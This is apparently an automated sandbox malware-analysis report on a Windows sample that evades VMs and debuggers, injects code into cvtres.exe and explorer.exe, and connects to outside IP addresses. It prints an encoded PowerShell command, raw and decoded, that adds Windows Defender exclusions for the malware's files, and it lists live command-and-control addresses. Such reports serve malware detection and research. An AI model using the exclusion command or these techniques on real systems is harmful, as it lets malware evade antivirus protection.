Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep count: 2180 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep count: 410 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7240	Thread sleep count: 95 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7688	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: cvtres.exe	Binary or memory string: FNmemReayNlS3N9ZAhqemuzZTtqBmdmbB1qbXbSezl4AX96ZAlxZGUDcjpkCXN6a3F0fGpKZCFsfmRtdjNRfnipYD1kOkdkZThffWTBbz1rA098aiVDZmwOcip2Mlp+eCJDemTebSNlO1Z9ZCpXemsHYjtqJlpmbFI5bXbmfDl4QSx6ZA0sZGUTdDpkFS56ayo9fGpmZSFsNi1tdnEtfnjRbT1kejtkZTAafWQVZT1rOwp8anoAZmzuhit2Yhl+eFAAe
Source: WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen
Source: WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:Microsoft\|VMWare\|Virtual
Source: cvtres.exe	Binary or memory string: OVmCIeEoTlkoRbs8QYAx5QJAFi5bpivwDUAhLUW7K+A0TlIh4ehOgWF2ajlBkzVfni1VmSBWpTVCoTHt8k+baXBqO1qZIOElRVYjQ4c08iBSTC7try2QqTmTLUAGJlCmPVmnIJ29IsCkgn//z78nqD5Hpy+ftytKgS3yrz9IrSHIr4Z85dGtJ6U+Wbg787gkVaMqVZgs7Lo5k6ksVawvWrgi+a4jT6w1Uq4j+7Mwjrw/R6AuW50u8rAtcqc6WJMh+607
Source: WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: cvtres.exe	Binary or memory string: Q1kkLPKIzgtjaXCCKt99bCJSgT7hdWTgS2w+V6Iu4SCfMfrl0WR2ayviqa03uZeEalkp/ZC3N6xJckZsoSOwY2FT9KM8uHVpYWC3L5JZYmpsviSSQPVxer4pnmZwVmCiIpV3YlPhsS6TanJoZSHh5FJ7YXZlxzNg+qz2555nHz0v8rqMaTGKlOapCSYz0U5sankp+z+gOvO2hIz5mJntpRJWyzR5ZHasJ01YF3VpaiTnfOu+SHAzwL1tdmQu7aMt7j1V
Source: cvtres.exe	Binary or memory string: CbKIMk31SnIGcgexxPFCMbyxeLA+tX52src2tTJwM7ItsqwyYfVmciJyI7HY8R4x2LEcsFK1EnbWt1K1TnBPsk2yzDIB9QZyQnJDsbjxPjH4sTywdrU2duq3brVqcGuyYbLgMiX1InJecp+xXPHaMRSx0LCWtdZ2CreOtYpwi7KBsgAyxfXCcrpyu7Fw8fYxMLH0sKq16nYut6q1pnCnsqWyJDLZ9Z5y2nLbsRDxljFQsZSwyrWKdk63yrXCcMOy+bJ4
Source: cvtres.exe	Binary or memory string: FgtaUltSYBxbREkpNRceFxsNGkQTDwYRUU0uEFNNXhgAGxEeEQEaDQ5SEgYrFBYKSEcFEQRMUExccwNZK08FHgFSekAASTRRSlMRRlF6BxEXGEBQORJIAgsWEwUVOxsODjYUCwYIV0YaSFp8Ax4GS0szAk5GF1VNDhcFV0s7AkFKTxcGHQsLADUUBBs1FBMMGFd8AgM9WDhaFR4FHTswNCY2FxgdHBofQgg6RjdcExYdIRcXDUoHFyoYAg9ITU1hBQwr
Source: WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: cvtres.exe	Binary or memory string: Dr9+RwoHCZsxLzjDNKs4ay/reydGq16rfict+zFbOOM0X0eHMycymw5PBYMNCwDrFGtDx39rZotGJxWbOVsw4zxfT4c7JzqbBg8OYwILDasdi0nHdStta00nHNs8uzTjOB9IZzwnP9sDrwuDB0sLCx9rSod2i25LTkceGz2bKYMl31VHIUcg2xyvFEMYaxRrA6tXp2vrc0tTRwLbIrsq4yYfVmciJyHbGa8Rgx1LEQsFa1CHbIt0i1RnBHsnmy+DIx9T
Source: cvtres.exe	Binary or memory string: IfvuVtlqbGox6qMie7Qxcrs6V54u4+FDyXFkeSxV70fBcGpyIVmcIvKkPlmZOo+pJH3gQs5oZWcx+qsxVeJPy2lwajri/kiqeWF2InsmXFEkR+BC1mhlZzFSKF1MPuLPTehqcmkj54IxlqMj+7Ewcqs+VSJCQCzsujhHuSj970epcGpyIVmUIvKkP0mwOvHFSOZkZmYkVr81QqUx7zpPCyD7kz7g7kiqeWF2Inu5NPIoUiwuVYIs7Kk97eVApmtjaTzh
Source: cvtres.exe	Binary or memory string: 0QHcCaQmqA2gKqWAfJXkVow9/BbAPZR+ycQd5Gap+OXqEMu0iQjTuojhCprisfuInTVjnbnkMYxS5B3kFtfmLOF+HAmkVsGnuPVUwH2sIqQVmH6kUZhm0bjzscm6xvH89bzJAJiXlYUk8+rQ9VydHIuiCc7+JMS2rs3E3aaI287MpRagnp6FpIPRVZR8leRWzLHOKNuAuSF486qovQ6g5uKd+IetyewNoB6sl8p43WJot+yZWReM4TjVipi5DqB52ErY
Source: cvtres.exe	Binary or memory string: kcHx202zczn5mcH3Zec/aYmRtcJ9pjJYkaTw6VHlfSCFwOTO/bLCitGa6tx55CB1ZZFZL+Wnq8KlpsbeqeaG2lHCMhgFsDhyrZqWoPXkrPo1kgp98aW91r2m3scJ5yd5ZcEFL8Wz+7GFmb2KgebajSGRHWtJpwdtgaXh+enlxZjNwKyFebFFD5mbo5Yt5nYgmZCk0A2kQCiNpOz0VeR4Jw3Db0WBsb33TZt3QLXk7LnRke2ZOaV1Hl2mPiRB5Gwz1cO3
Source: cvtres.exe	Binary or memory string: 9oiHo5bTIJKv6qrah8N3w8HtXU4eG1dbT5Gg74AGq8ZzcEbFtfAiMarLMRyprQBtqbSoK+cieqJTRXmi7ymZaVEt+4RIzR/MlgvVEDu/Dz+3KcylNXA08A/ZTMcWELSQTfk0v89KgcsqEmUB46coZ77Wna79+Jb4jLPG1mocmoJcqzFP0dVSfxRfYD9zqKgWa4bCLSKjJHjnnjCervt9U/tIAgUcM7SqsrRfG5/ZWdiaW0J53wrNkU5KY0F61xEsVzBb
Source: WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: LdrLoadDllHRtlZeroMemory:Invalid ProcessInfoClass: {0}INtQueryInformationProcessKNtProtectVirtualMemoryCexplorer SbieDll.dll!cuckoomon.dll"win32_process.handle='{0}'#ParentProcessId$cmd%select * from Win32_BIOS8Unexpected WMI query failure&version'SerialNumber)VMware\|VIRTUAL\|A M I\|Xenselect from Win32_ComputerSystem+manufacturer,model-Microsoft\|VMWare\|Virtual.john/anna0xxxxxxxxBpowershellVStart-Sleep -Seconds 5; Remove-Item -Path '
Source: cvtres.exe	Binary or memory string: LAytXJ2trcytS5wL7ItsqwyYfVmciJyI7HY8R4x2LEcsFK1EnbWt1K1TnBPsk2yzDIF9QJyfnJ/sbzxOjH0sTCwdrU2duq3brVqcGuyYbLgMiX1InJecp+xXPHaMRSx0LCWtdZ2DreKtYZwh7KFsgQy+fX+crpyu7Fw8fYxMLH0sKq16nYut6q1pnCnsqWyJDLZ9Z5y2nLbsRTxkjFMsYiwzrWOdkK3xrXCcMOy+bJ4Mr31unL2cvexNPGyMWyxqLDut
Source: file.exe, 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: LdrLoadDllORtlZeroMemory:Invalid ProcessInfoClass: {0}PNtQueryInformationProcessRNtProtectVirtualMemoryJexplorer SbieDll.dll!cuckoomon.dll"win32_process.handle='{0}'#ParentProcessId$cmd%select * from Win32_BIOS8Unexpected WMI query failure&version'SerialNumber)VMware\|VIRTUAL\|A M I\|Xenselect from Win32_ComputerSystem+manufacturer,model-Microsoft\|VMWare\|Virtual.john/anna0xxxxxxxxFpowershellVStart-Sleep -Seconds 5; Remove-Item -Path '
Source: file.exe, 00000000.00000002.2876558142.000001FBA7420000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cvtres.exe	Binary or memory string: hrey3sL0KQNg+ZC/AHaajBZJMSUbiDBlFOHp4hp66eSaag23JKPL/Dxn7M97Am3ErfH1qN18r9wS/3eLgd82T/U0XERCn6mtt2P+L+5z3HALV1JXf32xcDoc1ow0GKAvtqIlWEQ7bDFtNheXqvbNFQz9srnEWmiYs8ZjYyjRI8EweYrH/H1A0YlRZ2cQ2dnCkfZX3JQeMujt83ron4HlO9zvr9zAZ0rhAb0mFqXfKjJSYby0NwHbL6dVOks9HjR33EU1
Source: cvtres.exe	Binary or memory string: lCisYR66Kxsa3lhMuH0+PjwV3YgVeLS5e5CcSz0cXhzkJb77sLp41dqPVK1Kn/EtR8teQq3AGcHth8waxekRe/p6flRcihZqiv4hoaVb3IedgKWLO0iTEUBdhOEH2saiWw+kyv5VW0p4TVmciv7Hn9xLf0QYWog6GLKZpeGJHndrKifYjbi3ubq+Fp2K3/EsTitn2zt+uLl5kJxJHbSu6qOYTTh7uPq7VF5IXncvrOWcSj94Ozm6V5nOH7SsCW3gmstQ
Source: cvtres.exe	Binary or memory string: GxCp2tBNQeJoPVGQa2yNllxpTZDAAVGsvQjtqIg1IbAUdQ3auWTl4CQhUZLUCSmU7UzpkiQBUazAMUmouQyFsChxDdhcVUHi9RT1k5gNKZdccU2R9Tz1rYw9SahMPSGwaVCp2GhZQeMUKVGQqTSNlpx9TZLEPVGub1DtqogJIbDAVQ3bu6zl4GQBUZPwKSmUrUjpk2QhUax8EUmpe1yFsFhRDdkofUHgx0j1kRglKZVsWU2QZ2j1rIwZSanoYSGxyxyp

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 154.216.20.243 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 37.203.243.102 3333	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.157.162.216 4444	Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\file.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\alfons\Desktop\file.exe; Add-MpPreference -ExclusionProcess C:\Users\alfons\Desktop\file.exe;Add-MpPreference -ExclusionPath C:\Users\alfons\AppData\Roaming\WindosCPUsystem.exe; Add-MpPreference -ExclusionProcess C:\Users\alfons\AppData\Roaming\WindosCPUsystem.exe
Source: C:\Users\user\Desktop\file.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\alfons\Desktop\file.exe; Add-MpPreference -ExclusionProcess C:\Users\alfons\Desktop\file.exe;Add-MpPreference -ExclusionPath C:\Users\alfons\AppData\Roaming\WindosCPUsystem.exe; Add-MpPreference -ExclusionProcess C:\Users\alfons\AppData\Roaming\WindosCPUsystem.exe			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\file.exe	NtQueryValueKey: Direct from: 0x7FF8A6833695	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtResumeThread: Direct from: 0x7FF849135A2C	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x7FF849118912	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQuerySystemInformation: Direct from: 0x7FF84912516F	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQuerySystemInformation: Direct from: 0x7FF8A6833812	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtSuspendThread: Direct from: 0x7FF8A8425FB5	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtSetInformationThread: Direct from: 0x7FF8A8465009	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtAdjustPrivilegesToken: Direct from: 0x7FF8A58F1BEC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x7FF849118B6F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtProtectVirtualMemory: Direct from: 0x7FF8A58FB1AC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtClose: Direct from: 0x7FF8A683713F
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtResumeThread: Direct from: 0x7FF8A8426199	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQueryValueKey: Direct from: 0x7FF8A846E9FE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQuerySystemInformation: Direct from: 0x7FF8A683348F	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtAllocateVirtualMemory: Direct from: 0x7FF849133A99	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtQueryInformationToken: Direct from: 0x7FF8C88A26A1	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtWriteVirtualMemory: Direct from: 0x7FF849134B82	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtAllocateVirtualMemory: Direct from: 0x7FF8A8498212	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x7FF8A8460906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtUnmapViewOfSection: Direct from: 0x7FF849104786	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x7FF8A896CAC6	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtSetInformationProcess: Direct from: 0x7FF8A851A005	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtCreateFile: Direct from: 0x7FF84910A3F6	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQueryAttributesFile: Direct from: 0x7FF8A6834413	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtOpenKey: Direct from: 0x7FF8A84747E4	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtDelayExecution: Direct from: 0x7FF8A8405073	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtSetInformationThread: Direct from: 0x7FF8A856C20C	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQuerySystemInformation: Direct from: 0x7FF8A84253EE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQueryValueKey: Direct from: 0x7FF8A846EA74	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtQueryAttributesFile: Direct from: 0x7FF8A84DBC4A	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtReadFile: Direct from: 0x7FF8A682C9C8	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtSetInformationProcess: Direct from: 0x7FF8A58F5585	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtSetInformationProcess: Direct from: 0x7FF8A58F5104	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtQuerySystemInformation: Direct from: 0x7FF8A8498FF3	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtMapViewOfSection: Direct from: 0x7FF8A6833EA1	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtCreateFile: Direct from: 0x7FF8A683517F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtSetContextThread: Direct from: 0x7FF8491055D6	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtProtectVirtualMemory: Direct from: 0x7FF8A84B2EA4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtSetInformationProcess: Direct from: 0x7FF8A845FF6B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtClose: Direct from: 0x7FF8A8497188
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtCreateThreadEx: Direct from: 0x7FF8A8498EE0	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQueryValueKey: Direct from: 0x7FF8A68355C5	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtOpenKeyEx: Direct from: 0x7FF8A6837FC1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtAllocateVirtualMemory: Direct from: 0x7FF8C88C4B5E	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQueryValueKey: Direct from: 0x7FF8A6835768	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtOpenKeyEx: Direct from: 0x7FF8A84D87B7	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtSetInformationProcess: Direct from: 0x7FF8A851A028	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQuerySystemInformation: Direct from: 0x7FF8A851A148	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtWriteVirtualMemory: Direct from: 0x7FF849105032	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtUnmapViewOfSection: Direct from: 0x7FF8A6833F5F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtAllocateVirtualMemory: Direct from: 0x7FF849103F49	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQueryVolumeInformationFile: Direct from: 0x7FF8A683734C	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQuerySystemInformation: Direct from: 0x7FF8A8916856	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtCreateFile: Direct from: 0x7FF8490EA3F6	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtSetInformationProcess: Direct from: 0x7FF8A845FF46	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQueryValueKey: Direct from: 0x7FF8A84740A3	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtSetContextThread: Direct from: 0x7FF849135126	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtResumeThread: Direct from: 0x7FF849105EDC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtMapViewOfSection: Direct from: 0x7FF8A84FA7F5	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtQueryValueKey: Direct from: 0x7FF8A4E61DC5	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtDeviceIoControlFile: Direct from: 0x7FF8A85AF207	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtQuerySystemInformation: Direct from: 0x7FF8A58F1285	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtOpenKey: Direct from: 0x7FF8A58F5401	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x7FF8491258AD	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	NtResumeThread: Direct from: 0x7FF8A8498CF6	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtUnmapViewOfSection: Direct from: 0x7FF8A6833C7D	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtUnmapViewOfSection: Direct from: 0x7FF8491342D6	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 140000000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 140000000 value starts with: 4D5A			Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 140000000 value: 4D	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 140001000 value: 40	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 140360000 value: 00	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 1404C8000 value: 20	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 1407FB000 value: 00	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 14081B000 value: 48	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 14081C000 value: 48	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 14081F000 value: 48	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 140821000 value: CE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 140822000 value: 00	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 140823000 value: 00	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Memory written: PID: 7236 base: 82A010 value: 00	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread register set: target process: 7216	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Thread register set: target process: 7236	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Thread register set: target process: 1120	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 140000000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 140001000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 140006000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 140008000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1406C0000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1406C1000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1406C2000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1406C3000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 5508B21010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 140000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 140001000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 140006000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 140008000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1406C0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1406C1000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1406C2000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1406C3000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: C813A26010	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"	Jump to behavior
